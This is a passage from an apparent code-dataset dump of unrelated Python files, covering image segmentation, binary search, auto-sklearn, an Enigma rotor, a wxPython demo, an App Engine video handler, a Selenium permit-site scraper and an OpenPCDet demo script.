[newImage[i,j,0],newImage[i,j,1],newImage[i,j,2]]\n \n k= numberOfClusters\n \n if clusteringMethod == 'kmeans':\n \n kmeans = KMeans(n_clusters=k).fit(repMat)\n labels=kmeans.labels_\n labels= np.reshape(labels,(size[0],size[1]))\n seg= labels\n \n elif clusteringMethod == 'gmm': \n \n gmm = mixture.GaussianMixture(n_components=k).fit(repMat,y='None')\n labels = gmm.predict(repMat)\n labels= np.reshape(labels,(size[0],size[1]))\n seg= labels\n \n elif clusteringMethod == 'hierarchical':\n \n import sklearn.cluster\n from sklearn.cluster import AgglomerativeClustering \n\n cluster = AgglomerativeClustering(n_clusters=k, affinity='euclidean', linkage='ward').fit(repMat) \n labels=cluster.labels_\n labels= np.reshape(labels,(size[0],size[1]))\n seg=labels\n \n elif clusteringMethod == 'watershed':\n \n a=2\n \n \n \n \n \n return seg\n","sub_path":"06-Segmentation/seg.py","file_name":"seg.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"300325343","text":"from random import randint\n\n\ndef binary_search(sorted_list, key):\n \"\"\"Search for key in sorted_list and returns index if key is found\n or (-insertion_point + 1) otherwise.\n Time complexity: O(log(n))\n \"\"\"\n\n lower, upper = 0, len(sorted_list) - 1\n while lower <= upper:\n mid = lower + (upper - lower) / 2\n if sorted_list[mid] == key:\n return mid\n elif sorted_list[mid] < key:\n lower = mid + 1\n elif sorted_list[mid] > key:\n upper = mid - 1\n return -lower - 1\n\n\ndef binary_search_recursive(sorted_list, key):\n \"\"\"Search for key in sorted_list and returns index if key is found\n or (-insertion_point + 1) otherwise; may stack overflow!\n Time complexity: O(log(n))\n \"\"\"\n\n def bs_in_range(sorted_list, key, lower, upper):\n if (upper < lower):\n return -lower - 1\n mid = lower + (upper - lower) / 2\n if sorted_list[mid] == key:\n return mid\n elif sorted_list[mid] < key:\n return bs_in_range(sorted_list, key, mid + 1, upper)\n else:\n return bs_in_range(sorted_list, key, lower, mid - 1)\n\n return bs_in_range(sorted_list, key, 0, len(sorted_list) - 1)\n\n\ndef binary_search_lowest_occurence(sorted_list, key):\n \"\"\"Search for key in sorted_list and returns lowest index if key is found\n or (-insertion_point + 1) otherwise.\n Time complexity: O(log(n))\n \"\"\"\n\n lower, upper, res = 0, len(sorted_list) - 1, -1\n while lower <= upper:\n mid = lower + (upper - lower) / 2\n if sorted_list[mid] == key:\n res = mid\n upper = mid - 1\n elif sorted_list[mid] < key:\n lower = mid + 1\n elif sorted_list[mid] > key:\n upper = mid - 1\n return res if res >= 0 else -lower - 1\n\n\ndef binary_search_highest_occurence(sorted_list, key):\n \"\"\"Search for key in sorted_list and returns highest index if key is found\n or (-insertion_point + 1) otherwise.\n Time complexity: O(log(n))\n \"\"\"\n\n lower, upper, res = 0, len(sorted_list) - 1, -1\n while lower <= upper:\n mid = lower + (upper - lower) / 2\n if sorted_list[mid] == key:\n res = mid\n lower = mid + 1\n elif sorted_list[mid] < key:\n lower = mid + 1\n elif sorted_list[mid] > key:\n upper = mid - 1\n return res if res >= 0 else -lower - 1\n\n\n# Tests\n\ndef binary_search_test_random(bs_func, occurence=None):\n print(\"Testing binary search \" + bs_func.__name__)\n n = 10\n sorted_array = _generate_sorted_array(n, k=10)\n keys = (randint(0, n) for _ in range(int(n / 4)))\n for key in keys:\n res = bs_func(sorted_array, key)\n\n # key not found\n if res < 0:\n msg = 
_msg(\"key was in array, but should not have been\",\n key=key, res=res, array=sorted_array)\n assert key not in sorted_array, msg\n\n insertion_offset = -(res + 1)\n _insert(sorted_array, insertion_offset, key)\n msg = _msg(\"key would have been inserted in wrong place\",\n key=key, res=res,\n expected_array_after_insertion=sorted(sorted_array),\n array_after_insertion=sorted_array)\n assert sorted(sorted_array) == sorted_array, msg\n\n # key found\n else:\n msg = _msg(\"Key does not match\",\n key=key, res=res, array=sorted_array)\n assert key == sorted_array[res], msg\n\n if occurence == 'lowest':\n exc = sorted_array.index(key)\n msg = _msg(\"Failed to find lowest occurence\",\n exc=exc, res=res, key=key, array=sorted_array)\n assert exc == res, msg\n\n elif occurence == 'highest':\n exc = len(sorted_array) - sorted_array[::-1].index(key) - 1\n msg = _msg(\"Failed to find highest occurence\",\n exc=exc, res=res, key=key, array=sorted_array)\n assert exc == res, msg\n\n\ndef test_repeat(test_func, repeat):\n for i in range(repeat):\n print(\"Trial number: {}\").format(i)\n test_func()\n print\n\n\ndef _insert(array, offset, value):\n array.extend([0])\n for idx in reversed(range(offset + 1, len(array))):\n array[idx] = array[idx - 1]\n array[offset] = value\n\n\ndef _generate_sorted_array(n, k=1):\n return sorted(\n i for _ in range(n) for i in (randint(1, k) * [randint(0, n)])\n )\n\n\ndef _msg(msg, **kwargs):\n for key in kwargs:\n msg += '\\n'\n msg += key + \" = {}\".format(kwargs[key])\n return msg\n\n\nif __name__ == \"__main__\":\n n = 100\n test_repeat(lambda: binary_search_test_random(binary_search), n)\n test_repeat(lambda: binary_search_test_random(binary_search_recursive), n)\n test_repeat(\n lambda: binary_search_test_random(binary_search_lowest_occurence,\n occurence='lowest'), n\n )\n test_repeat(\n lambda: binary_search_test_random(binary_search_highest_occurence,\n occurence='highest'), n\n )\n","sub_path":"basic/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"587392971","text":"import logging\nimport multiprocessing\n\nimport numpy as np\n\nimport sklearn.datasets\nimport sklearn.metrics\n\nfrom autosklearn.classification import AutoSklearnClassifier\nfrom autosklearn.constants import *\n\ntmp_folder = '/tmp/autoslearn_example_tmp'\noutput_folder = '/tmp/autosklearn_example_out'\n\n\ndef spawn_classifier(seed, dataset_name):\n digits = sklearn.datasets.load_digits()\n X = digits.data\n y = digits.target\n indices = np.arange(X.shape[0])\n np.random.shuffle(indices)\n X = X[indices]\n y = y[indices]\n X_train = X[:1000]\n y_train = y[:1000]\n X_test = X[1000:]\n y_test = y[1000:]\n\n automl = AutoSklearnClassifier(time_left_for_this_task=60,\n per_run_time_limit=60,\n ml_memory_limit=1024,\n shared_mode=True,\n tmp_folder=tmp_folder,\n output_folder=output_folder,\n delete_tmp_folder_after_terminate=False,\n ensemble_size=0,\n initial_configurations_via_metalearning=0,\n seed=seed)\n automl.fit(X_train, y_train, dataset_name=dataset_name)\n\nif __name__ == '__main__':\n processes = []\n for i in range(2, 6):\n p = multiprocessing.Process(target=spawn_classifier, args=(i, 'digits'))\n p.start()\n processes.append(p)\n for p in processes:\n p.join()\n\n digits = sklearn.datasets.load_digits()\n X = digits.data\n y = digits.target\n indices = np.arange(X.shape[0])\n np.random.shuffle(indices)\n X = X[indices]\n y = y[indices]\n 
X_train = X[:1000]\n y_train = y[:1000]\n X_test = X[1000:]\n y_test = y[1000:]\n\n print('Starting to build an ensemble!')\n automl = AutoSklearnClassifier(time_left_for_this_task=15,\n per_run_time_limit=15,\n ml_memory_limit=1024,\n shared_mode=True,\n ensemble_size=50,\n ensemble_nbest=200,\n tmp_folder=tmp_folder,\n output_folder=output_folder,\n initial_configurations_via_metalearning=0,\n seed=1)\n\n # Both the ensemble_size and ensemble_nbest parameters can be changed later\n automl.fit_ensemble(task=MULTICLASS_CLASSIFICATION,\n metric=ACC_METRIC,\n precision='32',\n dataset_name='digits',\n ensemble_size=10,\n ensemble_nbest=10)\n\n predictions = automl.predict(X_test)\n print(automl.show_models())\n print(\"Accuracy score\", sklearn.metrics.accuracy_score(y_test, predictions))","sub_path":"example/example_parallel.py","file_name":"example_parallel.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"89367239","text":"from collections import deque\nfrom core_enigma.settings.settings import LETTERS, NUMBERS\nfrom core_enigma.scrambler.validators import WiringCharactersDescriptor\n\n\nclass RotorInputIndexError(Exception):\n def __init__(self, index):\n \"\"\"\n\n \"\"\"\n msg = (\n f\"Reflector index error!. {index} is out of range. \"\n f\"Must be in range 0 to 25\")\n super().__init__(msg)\n\n\nclass RotorCore:\n\n _wire_chars = WiringCharactersDescriptor(self_wired=True)\n\n def __init__(self, rotor, device_id, wiring_characters, charset_flag='L'):\n \"\"\"\n\n \"\"\"\n self._rotor = rotor\n self._device_id = device_id\n self._wire_chars = wiring_characters\n self._charset_flag = None\n self._charset = None\n self.character_set_flag = charset_flag\n self._lh_translation_map = {}\n self._rh_translation_map = {}\n self._make_translation_maps()\n\n def __repr__(self):\n \"\"\"\n returns a string with the 'ROTOR_ID' 'RING CHARACTERS'\n 'WIRING CHARACTERS' and 'TURNOVER CHARACTERS'. The parameters\n are the same as those used to initialize the rotor.\n \"\"\"\n\n rot_str = (f\"ROTOR ID : {self._device_id}\\n\"\n f\"RING CHARACTERS : {self._rotor.ring_characters}\\n\"\n f\"WIRING CHARACTERS : {self._wire_chars}\\n\"\n f\"TURNOVER CHARACTERS : {self._rotor.turnover_characters}\\n\")\n\n rot_str += \"LH_TRANSLATION_TABLE\\n\"\n for position, translation in self._lh_translation_map.items():\n trans_str = \"\"\n for i in translation:\n trans_str += f\"{LETTERS[i]} \"\n rot_str += f\"{str(position).rjust(2, '0')} {trans_str}\\n\"\n\n rot_str += \"RH_TRANSLATION_TABLE\\n\"\n for position, translation in self._rh_translation_map.items():\n trans_str = \"\"\n for i in translation:\n trans_str += f\"{LETTERS[i]} \"\n rot_str += f\"{str(position).rjust(2, '0')} {trans_str}\\n\"\n\n return rot_str\n\n def __str__(self):\n \"\"\"\n returns a string with the 'ROTOR ID' 'ROTOR SETTING'\n 'RING SETTING' 'RING CHARACTERS' 'WIRING CHARACTERS'\n and 'TURNOVER CHARACTERS'. The rotor setting and ring\n setting are the current settings. 
The rest of the \n parameters are the same as those used to initialize\n the rotor.\n \"\"\"\n def list_to_string(list_):\n return ','.join(['{:<2}'.format(char) for char in list_])\n\n return (f\"ROTOR ID -----------: {self._device_id}\\n\"\n f\"ROTOR SETTING ------: {self._rotor.rotor_setting}\\n\"\n f\"RING SETTING -------: {self._rotor.ring_setting}\\n\"\n f\"RING CHARACTERS ----: {list_to_string(self._rotor.ring_characters)}\\n\"\n f\"WIRING CHARACTERS --: {list_to_string(self.wiring_characters)}\\n\"\n f\"TURNOVER CHARACTERS : {list_to_string(self._rotor.turnover_characters)}\\n\")\n\n @property\n def wiring_characters(self):\n \"\"\"\n\n \"\"\"\n char_map = { LETTERS[i] : self._charset[i] for i in range(26) }\n return [char_map[l] for l in self._wire_chars]\n\n @property\n def rotor_dict(self):\n \"\"\"\n returns a dictionary object with 'ROTOR_TYPE' 'ROTOR_SETTING'\n 'RING_SETTING' 'RING_CHARACTERS' 'ROTOR_CHARACTERS' and\n 'TURNOVER_CHARACTERS'. The ring characters list and rotor characters\n list are shifted to reflect there current values for the current ring\n and rotor settings.\n \"\"\"\n return {\n \"ROTOR_TYPE\": self.device_id,\n \"ROTOR_SETTING\": self._rotor.rotor_setting,\n \"RING_SETTING\": self._rotor.ring_setting,\n \"RING_CHARACTERS\": self._rotor.current_ring_characters(),\n \"WIRING_CHARACTERS\": self.current_wiring_characters(),\n \"TURNOVER_CHARACTERS\": self._rotor.turn_chars\n }\n\n def lh_output(self, index):\n \"\"\"\n\n \"\"\"\n try:\n offset = self._rotor.core_offset()\n return self._lh_translation_map[offset][index]\n except Exception:\n msg = f\"INDEX {index}\"\n raise RotorInputIndexError(msg)\n\n def rh_output(self, index):\n \"\"\"\n\n \"\"\"\n try:\n offset = self._rotor.core_offset()\n return self._rh_translation_map[offset][index]\n except Exception:\n msg = f\"\"\n raise RotorInputIndexError(msg)\n\n def valid_input_index(self, index):\n \"\"\"\n\n \"\"\"\n if index not in range(26):\n raise RotorInputIndexError(index)\n\n def current_wiring_characters(self):\n \"\"\"\n\n \"\"\"\n char_map = { i : self._charset[i] for i in range(26) }\n return [char_map[i] for i in self._lh_translation_map[self._rotor.core_offset]]\n\n @property\n def character_set(self):\n \"\"\"\n\n \"\"\"\n return self._charset\n\n @property\n def character_set_flag(self):\n \"\"\"\n\n \"\"\"\n return self._charset_flag\n\n @character_set_flag.setter\n def character_set_flag(self, flag):\n \"\"\"\n\n \"\"\"\n if flag in [\"L\",\"N\"]:\n self._charset_flag = flag\n self._charset = LETTERS if flag == 'L' else NUMBERS\n else:\n msg = (\n f\"Charset flag error!. {flag} is not a valid charset flag. 
\"\n f\"Must be 'L' or 'N'\")\n raise ValueError(msg)\n\n def _make_translation_maps(self):\n \"\"\"\n\n \"\"\"\n lh_translation_map = {}\n rh_translation_map = {}\n\n connections = deque(self._wire_chars)\n letters = deque(LETTERS)\n\n for i in range(26):\n lh_translation_arr = [letters.index(l) for l in connections]\n rh_translation_arr = [connections.index(l) for l in letters]\n lh_translation_map[i] = lh_translation_arr\n rh_translation_map[i] = rh_translation_arr\n connections.rotate(-1)\n letters.rotate(-1)\n self._lh_translation_map = lh_translation_map\n self._rh_translation_map = rh_translation_map\n","sub_path":"enigma/core_enigma/scrambler/rotor_core.py","file_name":"rotor_core.py","file_ext":"py","file_size_in_byte":6159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"638253243","text":"import bisect\n\n# From docs.python.org\n\ndef index(a, x):\n 'Locate the leftmost value exactly equal to x'\n i = bisect.bisect_left(a, x)\n if i != len(a) and a[i] == x:\n return i\n raise ValueError('index: Not found!')\n\ndef find_lt_ind(a, x):\n 'Find rightmost value less than x'\n i = bisect.bisect_left(a, x)\n if i:\n return i-1\n raise ValueError('find_lt: Not found!')\n\ndef find_lt(a, x):\n i = find_lt_ind(a, x)\n return a[i]\n\ndef find_le_ind(a, x):\n 'Find rightmost value less than or equal to x'\n i = bisect.bisect_right(a, x)\n if i:\n return i-1\n raise ValueError('find_le: Not found!')\n\ndef find_le(a, x):\n i = find_le_ind(a, x)\n return a[i]\n\ndef find_gt_ind(a, x):\n 'Find leftmost value greater than x'\n i = bisect.bisect_right(a, x)\n if i != len(a):\n return i\n raise ValueError('find_gt: Not found!')\n\ndef find_gt(a, x):\n i = find_gt_ind(a, x)\n return a[i]\n\ndef find_ge_ind(a, x):\n 'Find leftmost item greater than or equal to x'\n i = bisect.bisect_left(a, x)\n if i != len(a):\n return i\n print('a: '+repr(a))\n print('x: '+repr(x))\n raise ValueError('find_ge: Not found!')\n\ndef find_ge(a, x):\n i = find_ge_ind(a, x)\n return a[i]\n","sub_path":"scripts/ldetect_lib/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"96914124","text":"\n\"\"\"THe ScrokkbarFrame Example.\"\"\"\n\nimport wx\n\nclass ScrollbarFrame( wx.Frame ):\n\tdef __init__( self ):\n\t\twx.Frame.__init__( self, None, -1, 'Scrollbar Example', size=(300,200) )\n\t\tself.scroll = wx.ScrolledWindow( self, -1 )\n\t\tself.scroll.SetScrollbars( 1, 1, 600, 1000 )\n\t\tself.button = wx.Button( self.scroll, -1, \"Scroll Me\", pos=(50,20) )\n\t\tself.Bind( wx.EVT_BUTTON, self.OnClickTop, self.button )\n\t\tself.button2 = wx.Button( self.scroll, -1, \"Scroll Bake\", pos=(500,350))\n\t\tself.Bind( wx.EVT_BUTTON, self.OnClickBottom, self.button2 )\n\n\t\tbitmap = wx.Image( '0.jpg', wx.BITMAP_TYPE_JPEG).ConvertToBitmap();\n\t\tself.bmp = wx.StaticBitmap( self.scroll, bitmap=bitmap, pos=(500,400) )\n\n\tdef OnClickTop( self, event ):\n\t\tself.scroll.Scroll( 600, 400 )\n\n\tdef OnClickBottom( self, event ):\n\t\tself.scroll.Scroll( 1, 1)\n\nif __name__ == '__main__':\n\tapp = wx.PySimpleApp()\n\tframe = ScrollbarFrame()\n\tframe.Show()\n\tapp.MainLoop()\n","sub_path":"ScrollbarFrame.py","file_name":"ScrollbarFrame.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"478900646","text":"import views, webapp2, models, 
time\nfrom helpers.form_validation import Validate as valid\nfrom google.appengine.ext import ndb\n\n\nclass UnFeatureHandler(views.Template):\n\tdef get(self):\n\t\tuser = self.user_check()\n\t\tvid_key = ndb.Key(urlsafe=self.request.get('id'))\n\t\trecord = vid_key.get()\n\t\tif record.acc_key == user.key:\n\t\t\trecord.featured = False\n\t\t\trecord.put()\n\t\t\ttime.sleep(.5)\n\t\t\tself.redirect('/musician_profile')\n\t\telse:\n\t\t\tself.response.out.write('Not Authorized')\n\t\t\n\t\t\n\nclass FeatureHandler(views.Template):\n\tdef get(self):\n\t\tuser = self.user_check()\n\t\tvid_key = ndb.Key(urlsafe=self.request.get('id'))\n\t\trecord = vid_key.get()\n\t\t\n\t\tif record.acc_key == user.key:\n\t\t\tvideos = models.videos.Videos.query_by_account(user.key)\n\t\t\tfor v in videos:\n\t\t\t\tif v.featured == True:\n\t\t\t\t\tv.featured = False\n\t\t\t\t\tv.put()\n\t\t\t\n\t\t\trecord.featured = True\n\t\t\trecord.put()\n\t\t\ttime.sleep(.5)\n\t\t\tself.redirect('/musician_profile')\n\t\telse:\n\t\t\tself.response.out.write('Not Authorized')\n\t\t\n\t\t\n\t\t\n\t\nclass RemoveHandler(views.Template):\n\tdef get(self):\n\t\tuser = self.user_check()\n\t\tvid_key = ndb.Key(urlsafe=self.request.get('id'))\n\t\trecord = vid_key.get()\n\t\n\t\tif record.acc_key == user.key:\n\t\t\tvid_key.delete()\n\t\t\ttime.sleep(.5)\n\t\t\tself.redirect('/musician_profile')\n\t\telse:\n\t\t\tself.response.out.write('Not Authorized')\n\t\nclass AddHandler(views.Template):\n\tdef post(self):\n\t\tsubmission_video = valid.get_video(self.request.get('video_url'))\n\t\tvideo_genre = self.request.get('band_genre')\n\t\tacc_key = self.user_check()\n\t\tmusician = models.musician.Musician.query_by_account(acc_key.key)\n\t\tvideo = models.videos.Videos(embed_link = submission_video['embed_link'],\n\t\t\t\t\t\t\t\t\tacc_key = acc_key.key,\n\t\t\t\t\t\t\t\t\tmusician_key = musician.key,\n\t\t\t\t\t\t\t\t\tgenre_tag = video_genre,\n\t\t\t\t\t\t\t\t\tvideo_title = submission_video['title'],\n\t\t\t\t\t\t\t\t\tfeatured = False).put()\n\t\t\t\t\t\t\t\t\t\n\t\tif video and video_genre not in musician.band_genre:\n\t\t\tmusician.band_genre.append(video_genre)\n\t\t\tmusician.put()\n\t\t\t\n\t\ttime.sleep(.5)\n\t\tself.redirect('/musician_profile')\n\n\t\napp = webapp2.WSGIApplication([\n \n ('/video_unfeature*', UnFeatureHandler),\n\t('/video_feature', FeatureHandler),\n ('/video_remove*', RemoveHandler),\n ('/video_add*', AddHandler)\n\n\n], debug=True)","sub_path":"video_handler.py","file_name":"video_handler.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"618569950","text":"import csv\r\nimport time\r\nimport random\r\nimport selenium\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import Select\r\n\r\nPATH = \"C:\\\\Program Files (x86)\\\\chromedriver.exe\"\r\ndriver = webdriver.Chrome(PATH)\r\n\r\n### Monroe County, Florida\r\nurl = \"https://mcesearch.monroecounty-fl.gov/search/permits/\"\r\n\r\ndriver.get(url)\r\n\r\n# Set dropdown menus and search\r\nstatus = Select(driver.find_element_by_id('status'))\r\nstatus.select_by_visible_text('OPEN')\r\n\r\npermit_type = Select(driver.find_element_by_id('permit_type'))\r\npermit_type.select_by_visible_text('POOL & SPA')\r\n\r\nresults_length = Select(driver.find_element_by_name(\"permits-result_length\"))\r\nresults_length.select_by_visible_text(\"100\")\r\n\r\ntime.sleep(random.randint(2, 10))\r\n\r\n# scrape table\r\n# get rows\r\nrows = 
len(driver.find_elements_by_xpath(\"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/tbody/tr\"))\r\nprint(\"Rows: \" + str(rows))\r\n\r\n# get columns\r\ncols = len(driver.find_elements_by_xpath(\"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/tbody/tr[1]/td\"))\r\nprint(\"Columns: \" + str(cols))\r\n\r\n# scrape table header\r\nheader_list = []\r\nfor c in range(1, cols + 1):\r\n header = driver.find_element_by_xpath(\r\n \"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/thead/tr[1]/th[\"+str(c)+\"]\").text\r\n header_list.append(header)\r\n\r\n# scrape table body and click next until last page, sleep after each one\r\n\r\nvalue = \"\"\r\nvalues_list = []\r\n\r\n# scrape first page\r\nfor r in range(1, rows + 1):\r\n for c in range(1, cols + 1):\r\n value = driver.find_element_by_xpath(\r\n \"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/tbody/tr[\"+str(r)+\"]/td[\"+str(c)+\"]\").text\r\n values_list.append(value)\r\n\r\n# get next button\r\nnext_button_link = driver.find_element_by_link_text(\"Next\") # actually click this\r\nnext_button = driver.find_element_by_id(\"permits-result_next\") # use only to see if disabled\r\nnext_enabled = \"disabled\" not in next_button.get_attribute(\"class\")\r\n\r\nwhile(next_enabled):\r\n next_button_link.click()\r\n time.sleep(random.randint(2, 10))\r\n next_button_link = driver.find_element_by_link_text(\"Next\")\r\n next_button = driver.find_element_by_id(\"permits-result_next\") \r\n next_enabled = \"disabled\" not in next_button.get_attribute(\"class\")\r\n if(not next_enabled):\r\n # recalculate rows\r\n rows = len(driver.find_elements_by_xpath(\"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/tbody/tr\"))\r\n print(\"Rows on Last Page: \" + str(rows))\r\n\r\n #scrape table page\r\n for r in range(1, rows + 1):\r\n for c in range(1, cols + 1):\r\n value = driver.find_element_by_xpath(\r\n \"/html/body/div[2]/div/div[2]/div/div/div/div[2]/div/table/tbody/tr[\"+str(r)+\"]/td[\"+str(c)+\"]\").text\r\n values_list.append(value)\r\n\r\nprint(\"Header Length: \" + str(len(header_list)))\r\nprint(header_list)\r\nvalues_length = len(values_list)\r\nprint(\"Values Length: \" + str(values_length))\r\n\r\n# write to csv\r\nwith open('pool_permits_Monroe_FL.csv', mode='w', newline = '') as pool_file:\r\n pool_writer = csv.writer(pool_file, delimiter=',', quotechar='\"')\r\n\r\n pool_writer.writerow(header_list)\r\n for i in range(0, values_length, cols):\r\n pool_writer.writerow(values_list[i:i+cols])\r\n\r\ndriver.quit()\r\n\r\n### Maricopa County, Arizona\r\n# Do we want both residential and commercial?\r\n# Not possible to search by status, but shows in results. 
Issued, Reissued, Final\r\n# Application or Issue date is given, Expiration date looks sparse\r\n# no download button\r\n\r\n### Kern County, California\r\n# Advanced Search -> Search for Records -> Building\r\n# Status: Issued, Finaled, Reviewed\r\n# One date given\r\n# has a download button for csv\r\n\r\n### San Mateo County, California\r\n# Can't search for record type?\r\n# Has a download button for csv\r\n\r\n### Martin County, Florida\r\n# Has permit types for pool deck, pool barrier, pool enclosure\r\n# Has downloadable csv\r\n\r\n### Charlotte County, Florida\r\n# Can't search status\r\n# has downloadable csv\r\n\r\n### City of Atlanta, Georgia\r\n# downloadable results\r\n\r\n### Clark County, Nevada\r\n# no downloadable results\r\n\r\n### Wake County, North Carolina\r\n# Do we want both commercial and residential?\r\n# Can search status. What permit statuses do we want? Approved, Complete, Issued, Submitted?\r\n# slow load time\r\n# no dowloadable results\r\n\r\n# Must only scrape 3 more websites, can use csv for others\r\n","sub_path":"Pool Permit Web Scraping.py","file_name":"Pool Permit Web Scraping.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"279034788","text":"import argparse\nimport glob\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\nimport json\nfrom tqdm import tqdm as tqdm\nimport pandas as pd\n\nfrom pcdet.config import cfg, cfg_from_yaml_file\nfrom pcdet.datasets import DatasetTemplate\nfrom pcdet.models import build_network, load_data_to_gpu\nfrom pcdet.utils import common_utils\n\ndef create_dirs_if_not_exists(directories):\n if type(directories)==str:\n directories=[directories]\n\n for d in directories:\n if not os.path.isdir(d):\n os.makedirs(d)\n\n\ndef convert_to_numpy(x):\n if not isinstance(x, np.ndarray):\n x = x.cpu().numpy()\n return x\n\ndef get_all_files_in_tree(folderPath, extensions = ['jpg','png'], getCompletePaths=True):\n img_names = []\n for ext in extensions:\n img_names += glob.glob(\"{}/**/*.{}\".format(folderPath, ext), recursive=True)\n if not getCompletePaths:\n img_names = [os.path.basename(i) for i in img_names]\n return img_names\n\nclass DemoDataset(DatasetTemplate):\n def __init__(self, dataset_cfg, class_names, training=True, root_path=None, logger=None, ext='.bin'):\n \"\"\"\n Args:\n root_path:\n dataset_cfg:\n class_names:\n training:\n logger:\n \"\"\"\n super().__init__(\n dataset_cfg=dataset_cfg, class_names=class_names, training=training, root_path=root_path, logger=logger\n )\n self.root_path = root_path\n self.ext = ext\n is_dir = os.path.isdir(self.root_path)\n data_file_list = get_all_files_in_tree(\n self.root_path,\n getCompletePaths=True,\n extensions=[self.ext.lstrip(\".\")]\n ) if is_dir else [self.root_path]\n data_file_list.sort()\n self.sample_file_list = data_file_list\n\n\n def __len__(self):\n return len(self.sample_file_list)\n\n def __getitem__(self, index):\n if self.ext == '.bin':\n points = np.fromfile(self.sample_file_list[index], dtype=np.float32).reshape(-1, 4)\n elif self.ext == '.npy':\n points = np.load(self.sample_file_list[index])\n elif self.ext == '.csv':\n df = pd.read_csv(self.sample_file_list[index])\n points = np.array(df[['X', 'Y', 'Z', 'intensity']], dtype=np.float32)\n points[:, 3] = points[:, 3] / 255.0\n\n # print(\"===========points fresh=================\")\n #\n # print(points.shape)\n # print(np.min(points, axis=0))\n # print(np.max(points, axis=0))\n # 
print(points[np.random.randint(low=0, high=len(points), size=10)])\n # print(\"===========points fresh=================\")\n else:\n raise NotImplementedError\n\n input_dict = {\n 'points': points,\n 'frame_id': index,\n }\n\n data_dict = self.prepare_data(data_dict=input_dict)\n\n return data_dict, self.sample_file_list[index]\n\n\ndef parse_config():\n parser = argparse.ArgumentParser(description='arg parser')\n parser.add_argument('--cfg_file', type=str, default='cfgs/kitti_models/second.yaml',\n help='specify the config for demo')\n parser.add_argument('--data_path', type=str, default='demo_data',\n help='specify the point cloud data file or directory')\n parser.add_argument('--ckpt', type=str, default=None, help='specify the pretrained model')\n parser.add_argument('--ext', type=str, default='.bin', help='specify the extension of your point cloud data file')\n parser.add_argument('--visualize', action='store_true', help='whether to visualize')\n parser.add_argument('--output_dir', default=\"predictions_dir\", help='whether to visualize')\n\n\n args = parser.parse_args()\n\n cfg_from_yaml_file(args.cfg_file, cfg)\n\n return args, cfg\n\n\ndef main():\n args, cfg = parse_config()\n logger = common_utils.create_logger()\n if args.visualize:\n import mayavi.mlab as mlab\n from visual_utils import visualize_utils as V\n else:\n from visual_utils.conv_utils import boxes_to_corners_3d\n\n logger.info('-----------------Quick Demo of OpenPCDet-------------------------')\n demo_dataset = DemoDataset(\n dataset_cfg=cfg.DATA_CONFIG, class_names=cfg.CLASS_NAMES, training=False,\n root_path=Path(args.data_path), ext=args.ext, logger=logger\n )\n logger.info(f'Total number of samples: \\t{len(demo_dataset)}')\n\n model = build_network(model_cfg=cfg.MODEL, num_class=len(cfg.CLASS_NAMES), dataset=demo_dataset)\n model.load_params_from_file(filename=args.ckpt, logger=logger, to_cpu=True)\n model.cuda()\n model.eval()\n with torch.no_grad():\n for idx, (data_dict, filepath) in tqdm(enumerate(demo_dataset)):\n #logger.info(f'Visualized sample index: \\t{idx + 1}')\n data_dict = demo_dataset.collate_batch([data_dict])\n load_data_to_gpu(data_dict)\n pred_dicts, _ = model.forward(data_dict)\n\n if args.visualize:\n\n V.draw_scenes(\n points=data_dict['points'][:, 1:], ref_boxes=pred_dicts[0]['pred_boxes'],\n ref_scores=pred_dicts[0]['pred_scores'], ref_labels=pred_dicts[0]['pred_labels']\n )\n mlab.show(stop=True)\n else:\n create_dirs_if_not_exists([args.output_dir])\n #print (\"data path \", args.data_path)\n output_file = os.path.join(args.output_dir,os.path.splitext(os.path.basename(filepath))[0])\n output_file = output_file+\".npy\"\n predictions = pred_dicts[0]\n predictions['pred_boxes'] = convert_to_numpy(boxes_to_corners_3d(predictions['pred_boxes']))\n predictions['pred_scores'] = convert_to_numpy(predictions['pred_scores'])\n predictions['pred_labels'] = convert_to_numpy(predictions['pred_labels'])\n np.save(output_file, predictions)\n\n logger.info('Demo done.')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"176284373","text":"\n# coding: utf-8\n\n# In[75]:\n\n\nimport pandas as pd\nimport numpy as np\nimport datetime\nfrom ast import literal_eval\nimport Utilities.DataTransforms as UtilitiesDataTransforms\n\n# In[111]:\n\n\nclass IMDBMetaData:\n\n def __init__(self):\n self.location_raw = 
